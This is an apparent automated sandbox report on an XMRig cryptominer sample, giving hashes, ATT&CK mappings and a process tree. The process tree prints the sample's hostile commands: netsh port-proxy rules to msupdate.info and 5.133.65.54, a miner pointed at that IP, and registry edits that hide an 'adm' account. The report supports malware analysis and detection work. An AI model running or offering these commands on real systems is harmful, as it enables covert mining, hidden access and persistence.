xmrig | 4547b578ed4468731e348a47a16a26beeaf192c616b70d575f3a04328978a981

Analysis

max time kernel
148s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
18-05-2022 21:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

298a18db753d40380aa41c3cdde1825c.exe
Size

397KB
MD5

298a18db753d40380aa41c3cdde1825c
SHA1

a54eb952b7687bd8ad82c3934e3a3538547fb4a9
SHA256

4547b578ed4468731e348a47a16a26beeaf192c616b70d575f3a04328978a981
SHA512

3260d9c83dda85aebaf6f46d9c8e6dabaeec0bc03a85f8a1591aebc33c450a5943187282b1a0323eea949bceb00f866aced663c8b3433792173198e15558d4c7

Score

10^/10

xmrig evasion miner persistence

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe	xmrig
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe	xmrig
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe	xmrig

Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

$77_oracle.exe$77_oracle.exe

pid process

1272 $77_oracle.exe
4704 $77_oracle.exe
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
1272	$77_oracle.exe
4704	$77_oracle.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

298a18db753d40380aa41c3cdde1825c.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	298a18db753d40380aa41c3cdde1825c.exe

Modifies WinLogon 2 TTPs 3 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

298a18db753d40380aa41c3cdde1825c.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	298a18db753d40380aa41c3cdde1825c.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	298a18db753d40380aa41c3cdde1825c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\adm = "0"	298a18db753d40380aa41c3cdde1825c.exe

Modifies powershell logging option 1 TTPs
evasion

Modify Registry
T1112

Drops file in Windows directory 2 IoCs

Processes:

298a18db753d40380aa41c3cdde1825c.exe

description	ioc	process
File created	C:\Windows\SoftwareDistribution\config.xml	298a18db753d40380aa41c3cdde1825c.exe
File opened for modification	C:\Windows\SoftwareDistribution\config.xml	298a18db753d40380aa41c3cdde1825c.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Gathers network information 2 TTPs 6 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

NETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXE

pid process

4628 NETSTAT.EXE
2684 NETSTAT.EXE
1408 NETSTAT.EXE
220 NETSTAT.EXE
4524 NETSTAT.EXE
4276 NETSTAT.EXE

pid	process
4628	NETSTAT.EXE
2684	NETSTAT.EXE
1408	NETSTAT.EXE
220	NETSTAT.EXE
4524	NETSTAT.EXE
4276	NETSTAT.EXE

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

298a18db753d40380aa41c3cdde1825c.exe

pid	process
2448	298a18db753d40380aa41c3cdde1825c.exe
2448	298a18db753d40380aa41c3cdde1825c.exe
2448	298a18db753d40380aa41c3cdde1825c.exe
2448	298a18db753d40380aa41c3cdde1825c.exe
2448	298a18db753d40380aa41c3cdde1825c.exe
2448	298a18db753d40380aa41c3cdde1825c.exe
2448	298a18db753d40380aa41c3cdde1825c.exe
2448	298a18db753d40380aa41c3cdde1825c.exe
2448	298a18db753d40380aa41c3cdde1825c.exe
2448	298a18db753d40380aa41c3cdde1825c.exe
2448	298a18db753d40380aa41c3cdde1825c.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

648
648

pid	process
648
648

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

298a18db753d40380aa41c3cdde1825c.exemsiexec.exeNETSTAT.EXENETSTAT.EXENETSTAT.EXE$77_oracle.exeNETSTAT.EXENETSTAT.EXENETSTAT.EXE$77_oracle.exe

description	pid	process
Token: SeDebugPrivilege	2448	298a18db753d40380aa41c3cdde1825c.exe
Token: SeSecurityPrivilege	4444	msiexec.exe
Token: SeDebugPrivilege	1408	NETSTAT.EXE
Token: SeDebugPrivilege	220	NETSTAT.EXE
Token: SeDebugPrivilege	4524	NETSTAT.EXE
Token: SeLockMemoryPrivilege	1272	$77_oracle.exe
Token: SeLockMemoryPrivilege	1272	$77_oracle.exe
Token: SeDebugPrivilege	4276	NETSTAT.EXE
Token: SeDebugPrivilege	4628	NETSTAT.EXE
Token: SeDebugPrivilege	2684	NETSTAT.EXE
Token: SeLockMemoryPrivilege	4704	$77_oracle.exe
Token: SeLockMemoryPrivilege	4704	$77_oracle.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

$77_oracle.exe$77_oracle.exe

pid process

1272 $77_oracle.exe
4704 $77_oracle.exe

pid	process
1272	$77_oracle.exe
4704	$77_oracle.exe

Suspicious use of WriteProcessMemory 40 IoCs

Processes:

298a18db753d40380aa41c3cdde1825c.execsc.exe

description	pid	process	target process
PID 2448 wrote to memory of 3656	2448	298a18db753d40380aa41c3cdde1825c.exe	csc.exe
PID 2448 wrote to memory of 3656	2448	298a18db753d40380aa41c3cdde1825c.exe	csc.exe
PID 3656 wrote to memory of 4824	3656	csc.exe	cvtres.exe
PID 3656 wrote to memory of 4824	3656	csc.exe	cvtres.exe
PID 2448 wrote to memory of 988	2448	298a18db753d40380aa41c3cdde1825c.exe	chcp.com
PID 2448 wrote to memory of 988	2448	298a18db753d40380aa41c3cdde1825c.exe	chcp.com
PID 2448 wrote to memory of 3344	2448	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 2448 wrote to memory of 3344	2448	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 2448 wrote to memory of 1408	2448	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 2448 wrote to memory of 1408	2448	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 2448 wrote to memory of 220	2448	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 2448 wrote to memory of 220	2448	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 2448 wrote to memory of 4524	2448	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 2448 wrote to memory of 4524	2448	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 2448 wrote to memory of 5056	2448	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 2448 wrote to memory of 5056	2448	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 2448 wrote to memory of 2400	2448	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 2448 wrote to memory of 2400	2448	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 2448 wrote to memory of 1632	2448	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 2448 wrote to memory of 1632	2448	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 2448 wrote to memory of 3840	2448	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 2448 wrote to memory of 3840	2448	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 2448 wrote to memory of 3740	2448	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 2448 wrote to memory of 3740	2448	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 2448 wrote to memory of 1272	2448	298a18db753d40380aa41c3cdde1825c.exe	$77_oracle.exe
PID 2448 wrote to memory of 1272	2448	298a18db753d40380aa41c3cdde1825c.exe	$77_oracle.exe
PID 2448 wrote to memory of 3084	2448	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 2448 wrote to memory of 3084	2448	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 2448 wrote to memory of 4276	2448	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 2448 wrote to memory of 4276	2448	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 2448 wrote to memory of 4628	2448	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 2448 wrote to memory of 4628	2448	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 2448 wrote to memory of 2684	2448	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 2448 wrote to memory of 2684	2448	298a18db753d40380aa41c3cdde1825c.exe	NETSTAT.EXE
PID 2448 wrote to memory of 5092	2448	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 2448 wrote to memory of 5092	2448	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 2448 wrote to memory of 3764	2448	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 2448 wrote to memory of 3764	2448	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 2448 wrote to memory of 1888	2448	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe
PID 2448 wrote to memory of 1888	2448	298a18db753d40380aa41c3cdde1825c.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\298a18db753d40380aa41c3cdde1825c.exe
"C:\Users\Admin\AppData\Local\Temp\298a18db753d40380aa41c3cdde1825c.exe"
1⤵
- Checks computer location settings
- Modifies WinLogon
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2448

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\db5j3cda.cmdline"
2⤵
- Suspicious use of WriteProcessMemory
PID:3656

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8572.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8571.tmp"
3⤵
PID:4824

C:\Windows\system32\chcp.com
"C:\Windows\system32\chcp.com" 437
2⤵
PID:988

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
2⤵
PID:3344

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:1408

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:220

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:4524

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy reset
2⤵
PID:5056

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
2⤵
PID:2400

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=msupdate.info
2⤵
PID:1632

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
2⤵
PID:3840

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
2⤵
PID:3740

C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe
"C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe" -o 5.133.65.54:80 --http-port 888 -t 1
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1272

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
2⤵
PID:3084

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:4276

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:4628

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:2684

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
2⤵
PID:5092

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=703 connectport=80 connectaddress=5.133.65.54
2⤵
PID:3764

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
2⤵
PID:1888

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4444

C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4704

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Registry Run Keys / Startup Folder

T1060

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe
Filesize
3.7MB

MD5
3b89f9f1e9932eee5a031b0266894f5f

SHA1
c77b26bf58884507389cd1c5699174eec3459df2

SHA256
757fa687a9b4d461ffda78d93e4d812003307a9b9747dce7fb469625429cc551

SHA512
62eca2262b9a292c283844fd71a76bad6f1d59bd8c93541747f3cbd7b0532c81343da23781b81b9bdeb055aa6f2fd72dff0a520331331585601b3f86855a266b

Download Submit
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe
Filesize
3.7MB

MD5
3b89f9f1e9932eee5a031b0266894f5f

SHA1
c77b26bf58884507389cd1c5699174eec3459df2

SHA256
757fa687a9b4d461ffda78d93e4d812003307a9b9747dce7fb469625429cc551

SHA512
62eca2262b9a292c283844fd71a76bad6f1d59bd8c93541747f3cbd7b0532c81343da23781b81b9bdeb055aa6f2fd72dff0a520331331585601b3f86855a266b

Download Submit
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe
Filesize
3.7MB

MD5
3b89f9f1e9932eee5a031b0266894f5f

SHA1
c77b26bf58884507389cd1c5699174eec3459df2

SHA256
757fa687a9b4d461ffda78d93e4d812003307a9b9747dce7fb469625429cc551

SHA512
62eca2262b9a292c283844fd71a76bad6f1d59bd8c93541747f3cbd7b0532c81343da23781b81b9bdeb055aa6f2fd72dff0a520331331585601b3f86855a266b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8572.tmp
Filesize
1KB

MD5
b8a8c3ed50742ba9e2986506f9786e7a

SHA1
c659430083bf8077500bfbbc02911cf13baa1a42

SHA256
69242ba264b943c8ee2941e76b1583eccbd8d114e4076510d8044588dcd4cf03

SHA512
cdbcc6c5618b1c24083e6b72f8aa83d4a7cc773d305895dff4c36159410b6511a39a7e208d32c3246af49c628d1a14353981de42866a78a5039069ba4ab5571f

Download Submit
C:\Users\Admin\AppData\Local\Temp\config.json
Filesize
3KB

MD5
74fb175e205d74c162df04f8236ec94b

SHA1
57ccfe00ef11556ffa576c74eeecf3730659ae89

SHA256
1fb2afa760aeaee7a0201e34a6ff5071d5755312d14132e8956e840eaae78dc9

SHA512
8b7ab1c082a965b921f3a56a75e2190365e5b7f1519b4d8da9c78cded313ed151ed8967e9b0599077c284ea4127e0471ecdc936dd96ca624d5a9f5707ce54830

Download Submit
C:\Users\Admin\AppData\Local\Temp\db5j3cda.dll
Filesize
3KB

MD5
e576ffe32b6c816cf1e6d419b6330a7a

SHA1
8d192377f0023a9c92e95f5afe63f7b157cccebf

SHA256
cce6fe6cb48dfb4dbd1efd5e974447add4d7214d7814eaccc279172588a11a20

SHA512
37c276e26df52dfc524e93326b5b0f2a54e707c1bf0164bce7389ae04c396b6e491f051d162a5fb09bd237ad31f5dfcd2a228080259d0721a53baf242e45b126

Download Submit
C:\Users\Admin\AppData\Local\Temp\db5j3cda.pdb
Filesize
11KB

MD5
5c30403a478100bbd7cf042e8b29c537

SHA1
da6b6c7fe921ed31f01fc428d95cd0f9acc97b8a

SHA256
6f01726fca75a7ec0c44c5c4b83c3c76b44de908b05678a49ed0a6381cbb1f33

SHA512
5c3f4ebceaed6e0420f0d2b4d218d58dd88526d0d29c1449f740d18309db091859f0b90bdac2b866724da44c3dbded3b116bfbd613725eb0e3c868bf0f677874

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC8571.tmp
Filesize
652B

MD5
eb5ce9ec4448dd5958f15780ab1429cc

SHA1
5bd5d38005e044f3b698753757912216ed06d3a4

SHA256
09cadbcd339f5e9153bef7c15493abc862edfbd8e102bb358ffeae9a59ac048d

SHA512
b5f6b337cd06cf0abd70879d3975d7b64084875b79157944b32adb0774cb8fe6367bb89e2efa9df6f8ed4ba77125fdaad44aaf31195ae3007e0e9ec91cb87d67

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\db5j3cda.0.cs
Filesize
447B

MD5
1640a04633fee0dfdc7e22c4f4063bf6

SHA1
3cb525c47b5dd37f8ee45b034c9452265fba5476

SHA256
55e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0

SHA512
85c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\db5j3cda.cmdline
Filesize
309B

MD5
be263eaa8dd59d466f624a120eb13d30

SHA1
6bc7e84f6040e427cfdafcf62ca9eaa5bf5fe19f

SHA256
34dbd8e662d4719d9d8981b3edae779c30093bad149f79f2a2e6a250b1efd697

SHA512
a49a4f2aa8e03aae00705b006162a4b48a85bb565551f4189eeba8507d5f0c608acb848096e6df6930954bf535e02eb1eab376fc9c11b42800d2a700ce9e8007

Download Submit
memory/220-142-0x0000000000000000-mapping.dmp

Download
memory/988-139-0x0000000000000000-mapping.dmp

Download
memory/1272-153-0x0000020286020000-0x0000020286060000-memory.dmp

Filesize
256KB

Download
memory/1272-149-0x0000000000000000-mapping.dmp

Download
memory/1272-152-0x0000020284730000-0x0000020284750000-memory.dmp

Filesize
128KB

Download
memory/1408-141-0x0000000000000000-mapping.dmp

Download
memory/1632-146-0x0000000000000000-mapping.dmp

Download
memory/1888-160-0x0000000000000000-mapping.dmp

Download
memory/2400-145-0x0000000000000000-mapping.dmp

Download
memory/2448-130-0x00007FFE51460000-0x00007FFE51FBD000-memory.dmp

Filesize
11.4MB

Download
memory/2448-166-0x00000000015AA000-0x00000000015AF000-memory.dmp

Filesize
20KB

Download
memory/2684-157-0x0000000000000000-mapping.dmp

Download
memory/3084-154-0x0000000000000000-mapping.dmp

Download
memory/3344-140-0x0000000000000000-mapping.dmp

Download
memory/3656-131-0x0000000000000000-mapping.dmp

Download
memory/3740-148-0x0000000000000000-mapping.dmp

Download
memory/3764-159-0x0000000000000000-mapping.dmp

Download
memory/3840-147-0x0000000000000000-mapping.dmp

Download
memory/4276-155-0x0000000000000000-mapping.dmp

Download
memory/4524-143-0x0000000000000000-mapping.dmp

Download
memory/4628-156-0x0000000000000000-mapping.dmp

Download
memory/4704-164-0x00000213830A0000-0x00000213830C0000-memory.dmp

Filesize
128KB

Download
memory/4704-165-0x00000213830C0000-0x00000213830E0000-memory.dmp

Filesize
128KB

Download
memory/4824-134-0x0000000000000000-mapping.dmp

Download
memory/5056-144-0x0000000000000000-mapping.dmp

Download
memory/5092-158-0x0000000000000000-mapping.dmp

Download